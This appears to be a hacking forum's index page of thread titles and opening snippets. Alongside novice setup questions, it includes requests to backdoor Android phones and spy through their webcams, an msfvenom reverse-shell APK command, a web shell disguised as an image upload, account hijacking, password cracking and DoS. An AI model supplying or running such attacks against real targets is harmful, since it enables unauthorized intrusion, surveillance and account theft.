General Discussion
Forum Thread: How to Hack Android Using Metasploit While on Ethernet?
my previous isp blocked ports, now i changed my isp , i successfuly port forwarded on my router but when i check open ports on any port checker it says "port closed . reason: connection timed out" . can i create a backdoor on android while being on ethernet ? please help :(
Forum Thread: MS Word Macro for Mac OS X
I've discovered an effective way to put a meterpreter payload inside of a word macro for Mac, would anyone be interested in a tutorial or would it be too much of a repeat of my previous tutorial for windows? If you guys want to know I'd be happy to write a tutorial on it, so let me know in the comments what you think.
Forum Thread: Changing Frequency Alongside Airodump-Ng to Attack Traffic Systems?
I know that traffic systems usually run at a frequency of ~5.8Ghz, and sometimes when using airodump-ng, I see some MAC Addresses under all of the WAPs. They have different info than the APs, which have the channel, encryption, etc. What are the below MACs and how ould they be exploited upon?
Forum Thread: What Would a Cybersecurity Career Be Like?
What would a pen testing/cyber sec programming job be like? I'm 13 and may want to be involved in this in the future. However, I feel that a penetration tester will soon run out of vulns to test (until someone finds a new one). What would you say about a pen testing/cyber sec programming career?
Forum Thread: HAVING PROBLEM INSTALLING KALI LINUX ON MY LAPTOP WHICH AS NOW AFFECTED MY WINDOWS 7 OS
Hello! I Am New to This Website and I Have Spent Sometime Looking Over Past Threads to See if Some Would Help Me with My Problem. But My Biggest Obstacle Is That I Am Just a Layperson with Very Little Knowledge of Computer Lingo. So I Am Hoping That Someone Could Help Me Here and Go Through the Steps with Me in Plain Non-Technical Language.
Forum Thread: Dosing Single Target?
hello guys,its about a month i didnt show up, i've got something to ask,and im very appreciate for anyone who answer my question....
Forum Thread: I Need Help on Hacking Android Phone
The fact is when i set "expoilt" it will create a session but when i connect it will end but most time it will work but the webcam-stream and webcam-list don't work but we must be on the same network connection.
Forum Thread: Hijacking (Teach Me)
I need help on how to hijack a youtube livestream or account. This is not for illegal purposes. I need to know how to (Windows 8)
Forum Thread: Kali Linux
How do I install the latest version of a virtual box for Kali Linux? I need a detailed how-to guide or a YouTube video, because so far
Forum Thread: ASP.NET Web Shell?
Anybody know of a good ASP.NET web shell? I know Metasploit is an option, but I'd rather not use it.
Forum Thread: Metasploit Framework MsfVenom Payload
I want to create a payload into the template.exe file and encrypt it with x86/shikataganai but when I run it it gives me the Error:
Forum Thread: Want to Become Modern Bounty Hunter?
Hello there my fellow hackers ! In this thread I want to introduce you with bounty programs. As you already know, in Wild West when the fugitive is on the run, there are bounties for his/her head. Nowadays it haven't changed a lot, there are still fugitives, there are still bounty hunters. But what about IT security? Can you earn some money if you find a bug somewhere? Of course you can.
Forum Thread: Hacking with Nikto
What can i do with this? I Found Following Vulnerabilities Using Nikto Script:
Forum Thread: Sslstrip
Hi my problem is , i cant manage to get sslstrip working on mitmf ,bettercap and ettercap. I tried each of them i wont get any error message but it wont seem to work since it cant convert https to http in any site. My question is that have the browsers any protection for this attack so it wont work now? Thanks for reading.
Forum Thread: This Kernal Requires x86-64CPU
This kernel requires a x86-64 CPU but only detected a i686Cpu? I am using VMware workstation 12 pro free trial,
Forum Thread: Why Localhost Doesn't Show index.html in /Var/Www/Http?
Hi Dears I have installed lamp according to linux basics tutorial part 11 about apache now I can't see my index.html and it shows bitnami page
Forum Thread: How to Enable Telnet in Huawei G532e Routers?
Hello all I have a Huawei G532e router , but Telnet port 23 is closed
Forum Thread: Changing Password for Ubuntu When Forgotten
Hi Buddies This Is My First Discussion so many of us forget passwords if we forget password for a website we can get it back by getting conformation code to our gmail account but what if u forget your pc password?
Forum Thread: How to Brute-Force SSH Passwords Using THC-HydrU
Usually, hackers are trying to get into the servers, as these contain juicy, profitable information.
Forum Thread: Screen Resolution - Drivers Kali?
Hello all, First of all i will apologize for some of the grammatical errors.
Forum Thread: Android Phone Hacking?
i tried this msfvenom -p android/meterpreter/reverse_tcp LHOST={ip} LPORT={port} R >/root/FILENAME.apk
Forum Thread: MS SQL Query, HELP!!!
I am having a problem executing this query please if anyone can help me out it wud be great. I suck when it comes to database stuff.... How to add username and pwd in MS Sql Query , ik my username and pwd, wud appreciate any help with the syntax
Forum Thread: About Making Fake AP.
Hello all. I'm using Easy-Creds to make fake access point
Forum Thread: InstaBrute Help?
i get error with selenium web driver.... but i don't know a fix, can anyone help me? -thanks for attention
Forum Thread: Hashcat Couldn't Start
hashcat -m 400 -a 0 /root/hash.txt /root/crak.txt hashcat (v3.20) starting...
Forum Thread: How to Crack Ubuntu/Linux Distribution Password?
We have Ubuntu in our college and it is password protected. i can only access few things on the PC, if i try to install or uninstall an application it asks a authentication password. I tried searching on net but it did not work. Even the passwd command requires root password.
Forum Thread: How to Change Mac Address of a Wireless Card in Windows 10 OS ? (Except 02 Prefix Ie:02:Xx:Xx:Xx:Xx:Xx)
I tried every mac changer ie. TMAC,Novirus,SMAC changer etc. and also tried device manager->driver->network address in windows 10.
Forum Thread: I Need Help on Uploading Shell but as Image Format.
I made a backdoor using weevely, but i discovered that the website i want to hack can only upload .jpg,.png,.gif but i tried using tamper data and live http header but they both didn't work for me.
Forum Thread: Want to Practice Pentest ? Then You Must Read This
Hello there dear hackers. This thread is for everyone who wants to practice penetration testing, or for those who want to know how are things working. Penetration testing can be illegal if you are testing without permission and you can earn 8 years in jail. We don't like that idea, so I want to present you, Vulnhub.
Forum Thread: How Do I Decrypt an DLL File
ive been trying to edit some .dll files and their all incrypted . ive tried .net reflector and its not an .Net module. ive tried the Xextool and that gave me an error aswell. resource hacker dindt do the job either ? what can i do to gain accces to the source code of this .dll ?
Forum Thread: I Accidentally Found a Bank Database Login and Password
I am not into php or mysql or web development but I found myself in a directory that I shouldn't be seeing in my bank website,
Forum Thread: How to Remotely Gain Control of a Windows 7 PC on the Same Network?
Hi, I am new here so bear with me.
Forum Thread: How Would One Create a Gif That Never Closes and Is Full Screen.
So me and my friend have been prancing each other and this is the only logical step.
Forum Thread: Dual Boot Windows 10 and OS X El Capitan on PC
when i boot mac os from usb this screen appear and didn't continue.
Forum Thread: rePy2exe - a Reverse Engineering Tool for py2exe Applications.
Reverse Engineering Tool for py2exe applications. Now it's easy to analyze malware and reverse engineer python applications
Forum Thread: 24/7 Metasploit Listener?
Suppose I want to do a USB drive by (Samy Kamkar) which involves a USB that will take action as a HID and will open a reverse shell to my metasploit listener.
Forum Thread: How to Find a Password Hash on a Server?
I have some knowledge of hash cracking with Hashcat, but how do you FIND a Hash?
Forum Thread: Anyone Have Experience in Cloning Site via Python?
I want to build some script which will include site cloner, so i wonder if anyone here have experience with that? Which libraries were used or framerwork, i need information. Cheers